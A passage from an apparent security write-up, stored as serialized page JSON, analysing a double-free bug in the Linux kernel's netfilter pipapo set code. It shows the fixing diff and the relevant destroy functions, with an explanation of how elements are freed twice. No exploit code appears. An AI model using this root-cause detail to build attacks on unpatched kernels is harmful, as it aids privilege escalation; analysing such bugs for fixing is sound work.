bug.",{"type":26,"tag":5512,"props":53357,"children":53359},{"className":42957,"code":53358,"language":42959,"meta":7,"style":7},"diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c\nindex c0ceea068936a6..df8de509024637 100644\n--- a/net/netfilter/nft_set_pipapo.c\n+++ b/net/netfilter/nft_set_pipapo.c\n@@ -2329,8 +2329,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n\n        m = rcu_dereference_protected(priv->match, true);\n\n  if (m) {\n   rcu_barrier();\n \n-  nft_set_pipapo_match_destroy(ctx, set, m);\n-\n   for_each_possible_cpu(cpu)\n    pipapo_free_scratch(m, cpu);\n   free_percpu(m->scratch);\n@@ -2342,8 +2340,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n  if (priv->clone) {\n   m = priv->clone;\n \n-  if (priv->dirty)\n-   nft_set_pipapo_match_destroy(ctx, set, m);\n+  nft_set_pipapo_match_destroy(ctx, set, m);\n \n   for_each_possible_cpu(cpu)\n    pipapo_free_scratch(priv->clone, cpu);\n",[53360],{"type":26,"tag":130,"props":53361,"children":53362},{"__ignoreMap":7},[53363,53371,53379,53387,53395,53403,53410,53418,53425,53433,53441,53449,53457,53465,53473,53481,53489,53497,53505,53513,53520,53528,53536,53544,53551,53558],{"type":26,"tag":137,"props":53364,"children":53365},{"class":5559,"line":5560},[53366],{"type":26,"tag":137,"props":53367,"children":53368},{"style":5573},[53369],{"type":32,"value":53370},"diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c\n",{"type":26,"tag":137,"props":53372,"children":53373},{"class":5559,"line":5412},[53374],{"type":26,"tag":137,"props":53375,"children":53376},{"style":5601},[53377],{"type":32,"value":53378},"index c0ceea068936a6..df8de509024637 100644\n",{"type":26,"tag":137,"props":53380,"children":53381},{"class":5559,"line":5417},[53382],{"type":26,"tag":137,"props":53383,"children":53384},{"style":5573},[53385],{"type":32,"value":53386},"--- a/net/netfilter/nft_set_pipapo.c\n",{"type":26,"tag":137,"props":53388,"children":53389},{"class":5559,"line":5642},[53390],{"type":26,"tag":137,"props":53391,"children":53392},{"style":5573},[53393],{"type":32,"value":53394},"+++ b/net/netfilter/nft_set_pipapo.c\n",{"type":26,"tag":137,"props":53396,"children":53397},{"class":5559,"line":5745},[53398],{"type":26,"tag":137,"props":53399,"children":53400},{"style":5601},[53401],{"type":32,"value":53402},"@@ -2329,8 +2329,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n",{"type":26,"tag":137,"props":53404,"children":53405},{"class":5559,"line":5850},[53406],{"type":26,"tag":137,"props":53407,"children":53408},{"emptyLinePlaceholder":18},[53409],{"type":32,"value":6276},{"type":26,"tag":137,"props":53411,"children":53412},{"class":5559,"line":5878},[53413],{"type":26,"tag":137,"props":53414,"children":53415},{"style":5601},[53416],{"type":32,"value":53417},"        m = rcu_dereference_protected(priv->match, true);\n",{"type":26,"tag":137,"props":53419,"children":53420},{"class":5559,"line":5891},[53421],{"type":26,"tag":137,"props":53422,"children":53423},{"emptyLinePlaceholder":18},[53424],{"type":32,"value":6276},{"type":26,"tag":137,"props":53426,"children":53427},{"class":5559,"line":5909},[53428],{"type":26,"tag":137,"props":53429,"children":53430},{"style":5601},[53431],{"type":32,"value":53432},"  if (m) {\n",{"type":26,"tag":137,"props":53434,"children":53435},{"class":5559,"line":5930},[53436],{"type":26,"tag":137,"props":53437,"children":53438},{"style":5601},[53439],{"type":32,"value":53440},"   rcu_barrier();\n",{"type":26,"tag":137,"props":53442,"children":53443},{"class":5559,"line":5939},[53444],{"type":26,"tag":137,"props":53445,"children":53446},{"style":5601},[53447],{"type":32,"value":53448}," \n",{"type":26,"tag":137,"props":53450,"children":53451},{"class":5559,"line":6191},[53452],{"type":26,"tag":137,"props":53453,"children":53454},{"style":6837},[53455],{"type":32,"value":53456},"-  nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":26,"tag":137,"props":53458,"children":53459},{"class":5559,"line":6208},[53460],{"type":26,"tag":137,"props":53461,"children":53462},{"style":6837},[53463],{"type":32,"value":53464},"-\n",{"type":26,"tag":137,"props":53466,"children":53467},{"class":5559,"line":6225},[53468],{"type":26,"tag":137,"props":53469,"children":53470},{"style":5601},[53471],{"type":32,"value":53472},"   for_each_possible_cpu(cpu)\n",{"type":26,"tag":137,"props":53474,"children":53475},{"class":5559,"line":6238},[53476],{"type":26,"tag":137,"props":53477,"children":53478},{"style":5601},[53479],{"type":32,"value":53480},"    pipapo_free_scratch(m, cpu);\n",{"type":26,"tag":137,"props":53482,"children":53483},{"class":5559,"line":6247},[53484],{"type":26,"tag":137,"props":53485,"children":53486},{"style":5601},[53487],{"type":32,"value":53488},"   free_percpu(m->scratch);\n",{"type":26,"tag":137,"props":53490,"children":53491},{"class":5559,"line":6270},[53492],{"type":26,"tag":137,"props":53493,"children":53494},{"style":5601},[53495],{"type":32,"value":53496},"@@ -2342,8 +2340,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n",{"type":26,"tag":137,"props":53498,"children":53499},{"class":5559,"line":6279},[53500],{"type":26,"tag":137,"props":53501,"children":53502},{"style":5601},[53503],{"type":32,"value":53504},"  if (priv->clone) {\n",{"type":26,"tag":137,"props":53506,"children":53507},{"class":5559,"line":6288},[53508],{"type":26,"tag":137,"props":53509,"children":53510},{"style":5601},[53511],{"type":32,"value":53512},"   m = priv->clone;\n",{"type":26,"tag":137,"props":53514,"children":53515},{"class":5559,"line":6355},[53516],{"type":26,"tag":137,"props":53517,"children":53518},{"style":5601},[53519],{"type":32,"value":53448},{"type":26,"tag":137,"props":53521,"children":53522},{"class":5559,"line":6363},[53523],{"type":26,"tag":137,"props":53524,"children":53525},{"style":6837},[53526],{"type":32,"value":53527},"-  if (priv->dirty)\n",{"type":26,"tag":137,"props":53529,"children":53530},{"class":5559,"line":6393},[53531],{"type":26,"tag":137,"props":53532,"children":53533},{"style":6837},[53534],{"type":32,"value":53535},"-   nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":26,"tag":137,"props":53537,"children":53538},{"class":5559,"line":6401},[53539],{"type":26,"tag":137,"props":53540,"children":53541},{"style":5626},[53542],{"type":32,"value":53543},"+  nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":26,"tag":137,"props":53545,"children":53546},{"class":5559,"line":6433},[53547],{"type":26,"tag":137,"props":53548,"children":53549},{"style":5601},[53550],{"type":32,"value":53448},{"type":26,"tag":137,"props":53552,"children":53553},{"class":5559,"line":6441},[53554],{"type":26,"tag":137,"props":53555,"children":53556},{"style":5601},[53557],{"type":32,"value":53472},{"type":26,"tag":137,"props":53559,"children":53560},{"class":5559,"line":6501},[53561],{"type":26,"tag":137,"props":53562,"children":53563},{"style":5601},[53564],{"type":32,"value":53565},"    pipapo_free_scratch(priv->clone, cpu);\n",{"type":26,"tag":35,"props":53567,"children":53568},{},[53569,53571,53577,53578,53584,53586,53592,53594,53600,53602,53607,53609,53615,53617,53623,53625,53631],{"type":32,"value":53570},"If the ",{"type":26,"tag":130,"props":53572,"children":53574},{"className":53573},[],[53575],{"type":32,"value":53576},"priv->dirty",{"type":32,"value":3339},{"type":26,"tag":130,"props":53579,"children":53581},{"className":53580},[],[53582],{"type":32,"value":53583},"priv->clone",{"type":32,"value":53585}," variables are set, ",{"type":26,"tag":130,"props":53587,"children":53589},{"className":53588},[],[53590],{"type":32,"value":53591},"nft_set_pipapo_match_destroy()",{"type":32,"value":53593}," is called twice, once with ",{"type":26,"tag":130,"props":53595,"children":53597},{"className":53596},[],[53598],{"type":32,"value":53599},"priv->match",{"type":32,"value":53601}," as an argument, and then again with ",{"type":26,"tag":130,"props":53603,"children":53605},{"className":53604},[],[53606],{"type":32,"value":53583},{"type":32,"value":53608},". Looking at what this function does, we can see that it is iterating over the ",{"type":26,"tag":130,"props":53610,"children":53612},{"className":53611},[],[53613],{"type":32,"value":53614},"setelem",{"type":32,"value":53616},"s of the ",{"type":26,"tag":130,"props":53618,"children":53620},{"className":53619},[],[53621],{"type":32,"value":53622},"set",{"type":32,"value":53624}," and calling ",{"type":26,"tag":130,"props":53626,"children":53628},{"className":53627},[],[53629],{"type":32,"value":53630},"nf_tables_set_elem_destroy()",{"type":32,"value":53632}," for each of them.",{"type":26,"tag":5512,"props":53634,"children":53636},{"className":19107,"code":53635,"language":4326,"meta":7,"style":7},"static void nft_set_pipapo_match_destroy(const struct nft_ctx *ctx,\n      const struct nft_set *set,\n      struct nft_pipapo_match *m)\n{\n struct nft_pipapo_field *f;\n int i, r;\n\n for (i = 0, f = m->f; i \u003C m->field_count - 1; i++, f++)\n  ;\n\n for (r = 0; r \u003C f->rules; r++) {\n  struct nft_pipapo_elem *e;\n\n  if (r \u003C f->rules - 1 && f->mt[r + 1].e == f->mt[r].e)\n   continue;\n\n  e = f->mt[r].e;\n\n  nf_tables_set_elem_destroy(ctx, set, &e->priv);\n }\n}\n",[53637],{"type":26,"tag":130,"props":53638,"children":53639},{"__ignoreMap":7},[53640,53687,53715,53741,53748,53769,53782,53789,53886,53894,53901,53956,53977,53984,54087,54099,54106,54142,54149,54183,54190],{"type":26,"tag":137,"props":53641,"children":53642},{"class":5559,"line":5560},[53643,53648,53653,53658,53662,53666,53670,53675,53679,53683],{"type":26,"tag":137,"props":53644,"children":53645},{"style":5573},[53646],{"type":32,"value":53647},"static",{"type":26,"tag":137,"props":53649,"children":53650},{"style":5573},[53651],{"type":32,"value":53652}," void",{"type":26,"tag":137,"props":53654,"children":53655},{"style":5682},[53656],{"type":32,"value":53657}," nft_set_pipapo_match_destroy",{"type":26,"tag":137,"props":53659,"children":53660},{"style":5601},[53661],{"type":32,"value":165},{"type":26,"tag":137,"props":53663,"children":53664},{"style":5573},[53665],{"type":32,"value":12244},{"type":26,"tag":137,"props":53667,"children":53668},{"style":5573},[53669],{"type":32,"value":23744},{"type":26,"tag":137,"props":53671,"children":53672},{"style":5601},[53673],{"type":32,"value":53674}," nft_ctx ",{"type":26,"tag":137,"props":53676,"children":53677},{"style":5590},[53678],{"type":32,"value":7152},{"type":26,"tag":137,"props":53680,"children":53681},{"style":5584},[53682],{"type":32,"value":22874},{"type":26,"tag":137,"props":53684,"children":53685},{"style":5601},[53686],{"type":32,"value":6099},{"type":26,"tag":137,"props":53688,"children":53689},{"class":5559,"line":5412},[53690,53694,53698,53703,53707,53711],{"type":26,"tag":137,"props":53691,"children":53692},{"style":5573},[53693],{"type":32,"value":34142},{"type":26,"tag":137,"props":53695,"children":53696},{"style":5573},[53697],{"type":32,"value":23744},{"type":26,"tag":137,"props":53699,"children":53700},{"style":5601},[53701],{"type":32,"value":53702}," nft_set ",{"type":26,"tag":137,"props":53704,"children":53705},{"style":5590},[53706],{"type":32,"value":7152},{"type":26,"tag":137,"props":53708,"children":53709},{"style":5584},[53710],{"type":32,"value":53622},{"type":26,"tag":137,"props":53712,"children":53713},{"style":5601},[53714],{"type":32,"value":6099},{"type":26,"tag":137,"props":53716,"children":53717},{"class":5559,"line":5417},[53718,53723,53728,53732,53737],{"type":26,"tag":137,"props":53719,"children":53720},{"style":5573},[53721],{"type":32,"value":53722},"      struct",{"type":26,"tag":137,"props":53724,"children":53725},{"style":5601},[53726],{"type":32,"value":53727}," nft_pipapo_match ",{"type":26,"tag":137,"props":53729,"children":53730},{"style":5590},[53731],{"type":32,"value":7152},{"type":26,"tag":137,"props":53733,"children":53734},{"style":5584},[53735],{"type":32,"value":53736},"m",{"type":26,"tag":137,"props":53738,"children":53739},{"style":5601},[53740],{"type":32,"value":5742},{"type":26,"tag":137,"props":53742,"children":53743},{"class":5559,"line":5642},[53744],{"type":26,"tag":137,"props":53745,"children":53746},{"style":5601},[53747],{"type":32,"value":13471},{"type":26,"tag":137,"props":53749,"children":53750},{"class":5559,"line":5745},[53751,53755,53760,53764],{"type":26,"tag":137,"props":53752,"children":53753},{"style":5573},[53754],{"type":32,"value":23744},{"type":26,"tag":137,"props":53756,"children":53757},{"style":5601},[53758],{"type":32,"value":53759}," nft_pipapo_field ",{"type":26,"tag":137,"props":53761,"children":53762},{"style":5590},[53763],{"type":32,"value":7152},{"type":26,"tag":137,"props":53765,"children":53766},{"style":5601},[53767],{"type":32,"value":53768},"f;\n",{"type":26,"tag":137,"props":53770,"children":53771},{"class":5559,"line":5850},[53772,53777],{"type":26,"tag":137,"props":53773,"children":53774},{"style":5573},[53775],{"type":32,"value":53776}," int",{"type":26,"tag":137,"props":53778,"children":53779},{"style":5601},[53780],{"type":32,"value":53781}," i, r;\n",{"type":26,"tag":137,"props":53783,"children":53784},{"class":5559,"line":5878},[53785],{"type":26,"tag":137,"props":53786,"children":53787},{"emptyLinePlaceholder":18},[53788],{"type":32,"value":6276},{"type":26,"tag":137,"props":53790,"children":53791},{"class":5559,"line":5891},[53792,53797,53802,53806,53810,53815,53819,53824,53828,53832,53837,53841,53845,53849,53854,53859,53863,53868,53873,53878,53882],{"type":26,"tag":137,"props":53793,"children":53794},{"style":5610},[53795],{"type":32,"value":53796}," for",{"type":26,"tag":137,"props":53798,"children":53799},{"style":5601},[53800],{"type":32,"value":53801}," (i ",{"type":26,"tag":137,"props":53803,"children":53804},{"style":5590},[53805],{"type":32,"value":289},{"type":26,"tag":137,"props":53807,"children":53808},{"style":5626},[53809],{"type":32,"value":5629},{"type":26,"tag":137,"props":53811,"children":53812},{"style":5601},[53813],{"type":32,"value":53814},", f ",{"type":26,"tag":137,"props":53816,"children":53817},{"style":5590},[53818],{"type":32,"value":289},{"type":26,"tag":137,"props":53820,"children":53821},{"style":5584},[53822],{"type":32,"value":53823}," m",{"type":26,"tag":137,"props":53825,"children":53826},{"style":5601},[53827],{"type":32,"value":16348},{"type":26,"tag":137,"props":53829,"children":53830},{"style":5584},[53831],{"type":32,"value":1042},{"type":26,"tag":137,"props":53833,"children":53834},{"style":5601},[53835],{"type":32,"value":53836},"; i ",{"type":26,"tag":137,"props":53838,"children":53839},{"style":5590},[53840],{"type":32,"value":8391},{"type":26,"tag":137,"props":53842,"children":53843},{"style":5584},[53844],{"type":32,"value":53823},{"type":26,"tag":137,"props":53846,"children":53847},{"style":5601},[53848],{"type":32,"value":16348},{"type":26,"tag":137,"props":53850,"children":53851},{"style":5584},[53852],{"type":32,"value":53853},"field_count",{"type":26,"tag":137,"props":53855,"children":53856},{"style":5590},[53857],{"type":32,"value":53858}," -",{"type":26,"tag":137,"props":53860,"children":53861},{"style":5626},[53862],{"type":32,"value":7104},{"type":26,"tag":137,"props":53864,"children":53865},{"style":5601},[53866],{"type":32,"value":53867},"; i",{"type":26,"tag":137,"props":53869,"children":53870},{"style":5590},[53871],{"type":32,"value":53872},"++",{"type":26,"tag":137,"props":53874,"children":53875},{"style":5601},[53876],{"type":32,"value":53877},", f",{"type":26,"tag":137,"props":53879,"children":53880},{"style":5590},[53881],{"type":32,"value":53872},{"type":26,"tag":137,"props":53883,"children":53884},{"style":5601},[53885],{"type":32,"value":5742},{"type":26,"tag":137,"props":53887,"children":53888},{"class":5559,"line":5909},[53889],{"type":26,"tag":137,"props":53890,"children":53891},{"style":5601},[53892],{"type":32,"value":53893},"  ;\n",{"type":26,"tag":137,"props":53895,"children":53896},{"class":5559,"line":5930},[53897],{"type":26,"tag":137,"props":53898,"children":53899},{"emptyLinePlaceholder":18},[53900],{"type":32,"value":6276},{"type":26,"tag":137,"props":53902,"children":53903},{"class":5559,"line":5939},[53904,53908,53913,53917,53921,53926,53930,53934,53938,53943,53948,53952],{"type":26,"tag":137,"props":53905,"children":53906},{"style":5610},[53907],{"type":32,"value":53796},{"type":26,"tag":137,"props":53909,"children":53910},{"style":5601},[53911],{"type":32,"value":53912}," (r ",{"type":26,"tag":137,"props":53914,"children":53915},{"style":5590},[53916],{"type":32,"value":289},{"type":26,"tag":137,"props":53918,"children":53919},{"style":5626},[53920],{"type":32,"value":5629},{"type":26,"tag":137,"props":53922,"children":53923},{"style":5601},[53924],{"type":32,"value":53925},"; r ",{"type":26,"tag":137,"props":53927,"children":53928},{"style":5590},[53929],{"type":32,"value":8391},{"type":26,"tag":137,"props":53931,"children":53932},{"style":5584},[53933],{"type":32,"value":35567},{"type":26,"tag":137,"props":53935,"children":53936},{"style":5601},[53937],{"type":32,"value":16348},{"type":26,"tag":137,"props":53939,"children":53940},{"style":5584},[53941],{"type":32,"value":53942},"rules",{"type":26,"tag":137,"props":53944,"children":53945},{"style":5601},[53946],{"type":32,"value":53947},"; r",{"type":26,"tag":137,"props":53949,"children":53950},{"style":5590},[53951],{"type":32,"value":53872},{"type":26,"tag":137,"props":53953,"children":53954},{"style":5601},[53955],{"type":32,"value":17395},{"type":26,"tag":137,"props":53957,"children":53958},{"class":5559,"line":6191},[53959,53963,53968,53972],{"type":26,"tag":137,"props":53960,"children":53961},{"style":5573},[53962],{"type":32,"value":8381},{"type":26,"tag":137,"props":53964,"children":53965},{"style":5601},[53966],{"type":32,"value":53967}," nft_pipapo_elem ",{"type":26,"tag":137,"props":53969,"children":53970},{"style":5590},[53971],{"type":32,"value":7152},{"type":26,"tag":137,"props":53973,"children":53974},{"style":5601},[53975],{"type":32,"value":53976},"e;\n",{"type":26,"tag":137,"props":53978,"children":53979},{"class":5559,"line":6208},[53980],{"type":26,"tag":137,"props":53981,"children":53982},{"emptyLinePlaceholder":18},[53983],{"type":32,"value":6276},{"type":26,"tag":137,"props":53985,"children":53986},{"class":5559,"line":6225},[53987,53991,53995,53999,54003,54007,54011,54015,54019,54023,54027,54031,54036,54041,54045,54049,54053,54058,54062,54066,54070,54074,54079,54083],{"type":26,"tag":137,"props":53988,"children":53989},{"style":5610},[53990],{"type":32,"value":33989},{"type":26,"tag":137,"props":53992,"children":53993},{"style":5601},[53994],{"type":32,"value":53912},{"type":26,"tag":137,"props":53996,"children":53997},{"style":5590},[53998],{"type":32,"value":8391},{"type":26,"tag":137,"props":54000,"children":54001},{"style":5584},[54002],{"type":32,"value":35567},{"type":26,"tag":137,"props":54004,"children":54005},{"style":5601},[54006],{"type":32,"value":16348},{"type":26,"tag":137,"props":54008,"children":54009},{"style":5584},[54010],{"type":32,"value":53942},{"type":26,"tag":137,"props":54012,"children":54013},{"style":5590},[54014],{"type":32,"value":53858},{"type":26,"tag":137,"props":54016,"children":54017},{"style":5626},[54018],{"type":32,"value":7104},{"type":26,"tag":137,"props":54020,"children":54021},{"style":5590},[54022],{"type":32,"value":16776},{"type":26,"tag":137,"props":54024,"children":54025},{"style":5584},[54026],{"type":32,"value":35567},{"type":26,"tag":137,"props":54028,"children":54029},{"style":5601},[54030],{"type":32,"value":16348},{"type":26,"tag":137,"props":54032,"children":54033},{"style":5584},[54034],{"type":32,"value":54035},"mt",{"type":26,"tag":137,"props":54037,"children":54038},{"style":5601},[54039],{"type":32,"value":54040},"[r ",{"type":26,"tag":137,"props":54042,"children":54043},{"style":5590},[54044],{"type":32,"value":356},{"type":26,"tag":137,"props":54046,"children":54047},{"style":5626},[54048],{"type":32,"value":7104},{"type":26,"tag":137,"props":54050,"children":54051},{"style":5601},[54052],{"type":32,"value":52951},{"type":26,"tag":137,"props":54054,"children":54055},{"style":5584},[54056],{"type":32,"value":54057},"e",{"type":26,"tag":137,"props":54059,"children":54060},{"style":5590},[54061],{"type":32,"value":5866},{"type":26,"tag":137,"props":54063,"children":54064},{"style":5584},[54065],{"type":32,"value":35567},{"type":26,"tag":137,"props":54067,"children":54068},{"style":5601},[54069],{"type":32,"value":16348},{"type":26,"tag":137,"props":54071,"children":54072},{"style":5584},[54073],{"type":32,"value":54035},{"type":26,"tag":137,"props":54075,"children":54076},{"style":5601},[54077],{"type":32,"value":54078},"[r].",{"type":26,"tag":137,"props":54080,"children":54081},{"style":5584},[54082],{"type":32,"value":54057},{"type":26,"tag":137,"props":54084,"children":54085},{"style":5601},[54086],{"type":32,"value":5742},{"type":26,"tag":137,"props":54088,"children":54089},{"class":5559,"line":6238},[54090,54095],{"type":26,"tag":137,"props":54091,"children":54092},{"style":5610},[54093],{"type":32,"value":54094},"   continue",{"type":26,"tag":137,"props":54096,"children":54097},{"style":5601},[54098],{"type":32,"value":5604},{"type":26,"tag":137,"props":54100,"children":54101},{"class":5559,"line":6247},[54102],{"type":26,"tag":137,"props":54103,"children":54104},{"emptyLinePlaceholder":18},[54105],{"type":32,"value":6276},{"type":26,"tag":137,"props":54107,"children":54108},{"class":5559,"line":6270},[54109,54114,54118,54122,54126,54130,54134,54138],{"type":26,"tag":137,"props":54110,"children":54111},{"style":5601},[54112],{"type":32,"value":54113},"  e ",{"type":26,"tag":137,"props":54115,"children":54116},{"style":5590},[54117],{"type":32,"value":289},{"type":26,"tag":137,"props":54119,"children":54120},{"style":5584},[54121],{"type":32,"value":35567},{"type":26,"tag":137,"props":54123,"children":54124},{"style":5601},[54125],{"type":32,"value":16348},{"type":26,"tag":137,"props":54127,"children":54128},{"style":5584},[54129],{"type":32,"value":54035},{"type":26,"tag":137,"props":54131,"children":54132},{"style":5601},[54133],{"type":32,"value":54078},{"type":26,"tag":137,"props":54135,"children":54136},{"style":5584},[54137],{"type":32,"value":54057},{"type":26,"tag":137,"props":54139,"children":54140},{"style":5601},[54141],{"type":32,"value":5604},{"type":26,"tag":137,"props":54143,"children":54144},{"class":5559,"line":6279},[54145],{"type":26,"tag":137,"props":54146,"children":54147},{"emptyLinePlaceholder":18},[54148],{"type":32,"value":6276},{"type":26,"tag":137,"props":54150,"children":54151},{"class":5559,"line":6288},[54152,54157,54162,54166,54170,54174,54179],{"type":26,"tag":137,"props":54153,"children":54154},{"style":5682},[54155],{"type":32,"value":54156},"  nf_tables_set_elem_destroy",{"type":26,"tag":137,"props":54158,"children":54159},{"style":5601},[54160],{"type":32,"value":54161},"(ctx, set, ",{"type":26,"tag":137,"props":54163,"children":54164},{"style":5590},[54165],{"type":32,"value":5694},{"type":26,"tag":137,"props":54167,"children":54168},{"style":5584},[54169],{"type":32,"value":54057},{"type":26,"tag":137,"props":54171,"children":54172},{"style":5601},[54173],{"type":32,"value":16348},{"type":26,"tag":137,"props":54175,"children":54176},{"style":5584},[54177],{"type":32,"value":54178},"priv",{"type":26,"tag":137,"props":54180,"children":54181},{"style":5601},[54182],{"type":32,"value":6430},{"type":26,"tag":137,"props":54184,"children":54185},{"class":5559,"line":6355},[54186],{"type":26,"tag":137,"props":54187,"children":54188},{"style":5601},[54189],{"type":32,"value":12185},{"type":26,"tag":137,"props":54191,"children":54192},{"class":5559,"line":6363},[54193],{"type":26,"tag":137,"props":54194,"children":54195},{"style":5601},[54196],{"type":32,"value":6507},{"type":26,"tag":35,"props":54198,"children":54199},{},[54200,54202,54208,54210,54215],{"type":32,"value":54201},"Which will then ",{"type":26,"tag":130,"props":54203,"children":54205},{"className":54204},[],[54206],{"type":32,"value":54207},"kfree()",{"type":32,"value":54209}," the ",{"type":26,"tag":130,"props":54211,"children":54213},{"className":54212},[],[54214],{"type":32,"value":53614},{"type":32,"value":470},{"type":26,"tag":5512,"props":54217,"children":54219},{"className":19107,"code":54218,"language":4326,"meta":7,"style":7},"void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,\n    const struct nft_set *set,\n    const struct nft_elem_priv *elem_priv)\n{\n struct nft_set_ext *ext = nft_set_elem_ext(set, elem_priv);\n\n if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPRESSIONS))\n  nft_set_elem_expr_destroy(ctx, nft_set_ext_expr(ext));\n\n kfree(elem_priv);\n}\n",[54220],{"type":26,"tag":130,"props":54221,"children":54222},{"__ignoreMap":7},[54223,54264,54292,54321,54328,54363,54370,54391,54414,54421,54434],{"type":26,"tag":137,"props":54224,"children":54225},{"class":5559,"line":5560},[54226,54231,54236,54240,54244,54248,54252,54256,54260],{"type":26,"tag":137,"props":54227,"children":54228},{"style":5573},[54229],{"type":32,"value":54230},"void",{"type":26,"tag":137,"props":54232,"children":54233},{"style":5682},[54234],{"type":32,"value":54235}," nf_tables_set_elem_destroy",{"type":26,"tag":137,"props":54237,"children":54238},{"style":5601},[54239],{"type":32,"value":165},{"type":26,"tag":137,"props":54241,"children":54242},{"style":5573},[54243],{"type":32,"value":12244},{"type":26,"tag":137,"props":54245,"children":54246},{"style":5573},[54247],{"type":32,"value":23744},{"type":26,"tag":137,"props":54249,"children":54250},{"style":5601},[54251],{"type":32,"value":53674},{"type":26,"tag":137,"props":54253,"children":54254},{"style":5590},[54255],{"type":32,"value":7152},{"type":26,"tag":137,"props":54257,"children":54258},{"style":5584},[54259],{"type":32,"value":22874},{"type":26,"tag":137,"props":54261,"children":54262},{"style":5601},[54263],{"type":32,"value":6099},{"type":26,"tag":137,"props":54265,"children":54266},{"class":5559,"line":5412},[54267,54272,54276,54280,54284,54288],{"type":26,"tag":137,"props":54268,"children":54269},{"style":5573},[54270],{"type":32,"value":54271},"    const",{"type":26,"tag":137,"props":54273,"children":54274},{"style":5573},[54275],{"type":32,"value":23744},{"type":26,"tag":137,"props":54277,"children":54278},{"style":5601},[54279],{"type":32,"value":53702},{"type":26,"tag":137,"props":54281,"children":54282},{"style":5590},[54283],{"type":32,"value":7152},{"type":26,"tag":137,"props":54285,"children":54286},{"style":5584},[54287],{"type":32,"value":53622},{"type":26,"tag":137,"props":54289,"children":54290},{"style":5601},[54291],{"type":32,"value":6099},{"type":26,"tag":137,"props":54293,"children":54294},{"class":5559,"line":5417},[54295,54299,54303,54308,54312,54317],{"type":26,"tag":137,"props":54296,"children":54297},{"style":5573},[54298],{"type":32,"value":54271},{"type":26,"tag":137,"props":54300,"children":54301},{"style":5573},[54302],{"type":32,"value":23744},{"type":26,"tag":137,"props":54304,"children":54305},{"style":5601},[54306],{"type":32,"value":54307}," nft_elem_priv ",{"type":26,"tag":137,"props":54309,"children":54310},{"style":5590},[54311],{"type":32,"value":7152},{"type":26,"tag":137,"props":54313,"children":54314},{"style":5584},[54315],{"type":32,"value":54316},"elem_priv",{"type":26,"tag":137,"props":54318,"children":54319},{"style":5601},[54320],{"type":32,"value":5742},{"type":26,"tag":137,"props":54322,"children":54323},{"class":5559,"line":5642},[54324],{"type":26,"tag":137,"props":54325,"children":54326},{"style":5601},[54327],{"type":32,"value":13471},{"type":26,"tag":137,"props":54329,"children":54330},{"class":5559,"line":5745},[54331,54335,54340,54344,54349,54353,54358],{"type":26,"tag":137,"props":54332,"children":54333},{"style":5573},[54334],{"type":32,"value":23744},{"type":26,"tag":137,"props":54336,"children":54337},{"style":5601},[54338],{"type":32,"value":54339}," nft_set_ext ",{"type":26,"tag":137,"props":54341,"children":54342},{"style":5590},[54343],{"type":32,"value":7152},{"type":26,"tag":137,"props":54345,"children":54346},{"style":5601},[54347],{"type":32,"value":54348},"ext ",{"type":26,"tag":137,"props":54350,"children":54351},{"style":5590},[54352],{"type":32,"value":289},{"type":26,"tag":137,"props":54354,"children":54355},{"style":5682},[54356],{"type":32,"value":54357}," nft_set_elem_ext",{"type":26,"tag":137,"props":54359,"children":54360},{"style":5601},[54361],{"type":32,"value":54362},"(set, elem_priv);\n",{"type":26,"tag":137,"props":54364,"children":54365},{"class":5559,"line":5850},[54366],{"type":26,"tag":137,"props":54367,"children":54368},{"emptyLinePlaceholder":18},[54369],{"type":32,"value":6276},{"type":26,"tag":137,"props":54371,"children":54372},{"class":5559,"line":5878},[54373,54377,54381,54386],{"type":26,"tag":137,"props":54374,"children":54375},{"style":5610},[54376],{"type":32,"value":18380},{"type":26,"tag":137,"props":54378,"children":54379},{"style":5601},[54380],{"type":32,"value":4625},{"type":26,"tag":137,"props":54382,"children":54383},{"style":5682},[54384],{"type":32,"value":54385},"nft_set_ext_exists",{"type":26,"tag":137,"props":54387,"children":54388},{"style":5601},[54389],{"type":32,"value":54390},"(ext, NFT_SET_EXT_EXPRESSIONS))\n",{"type":26,"tag":137,"props":54392,"children":54393},{"class":5559,"line":5891},[54394,54399,54404,54409],{"type":26,"tag":137,"props":54395,"children":54396},{"style":5682},[54397],{"type":32,"value":54398},"  nft_set_elem_expr_destroy",{"type":26,"tag":137,"props":54400,"children":54401},{"style":5601},[54402],{"type":32,"value":54403},"(ctx, ",{"type":26,"tag":137,"props":54405,"children":54406},{"style":5682},[54407],{"type":32,"value":54408},"nft_set_ext_expr",{"type":26,"tag":137,"props":54410,"children":54411},{"style":5601},[54412],{"type":32,"value":54413},"(ext));\n",{"type":26,"tag":137,"props":54415,"children":54416},{"class":5559,"line":5909},[54417],{"type":26,"tag":137,"props":54418,"children":54419},{"emptyLinePlaceholder":18},[54420],{"type":32,"value":6276},{"type":26,"tag":137,"props":54422,"children":54423},{"class":5559,"line":5930},[54424,54429],{"type":26,"tag":137,"props":54425,"children":54426},{"style":5682},[54427],{"type":32,"value":54428}," kfree",{"type":26,"tag":137,"props":54430,"children":54431},{"style":5601},[54432],{"type":32,"value":54433},"(elem_priv);\n",{"type":26,"tag":137,"props":54435,"children":54436},{"class":5559,"line":5939},[54437],{"type":26,"tag":137,"props":54438,"children":54439},{"style":5601},[54440],{"type":32,"value":6507},{"type":26,"tag":35,"props":54442,"children":54443},{},[54444,54445,54451,54453,54458,54460,54465,54467,54472,54473,54478,54480,54485,54487,54492,54494,54499],{"type":32,"value":19206},{"type":26,"tag":130,"props":54446,"children":54448},{"className":54447},[],[54449],{"type":32,"value":54450},"nft_pipapo_match",{"type":32,"value":54452}," objects contain views of the ",{"type":26,"tag":130,"props":54454,"children":54456},{"className":54455},[],[54457],{"type":32,"value":53614},{"type":32,"value":54459},"'s of a ",{"type":26,"tag":130,"props":54461,"children":54463},{"className":54462},[],[54464],{"type":32,"value":53622},{"type":32,"value":54466},". The difference between the 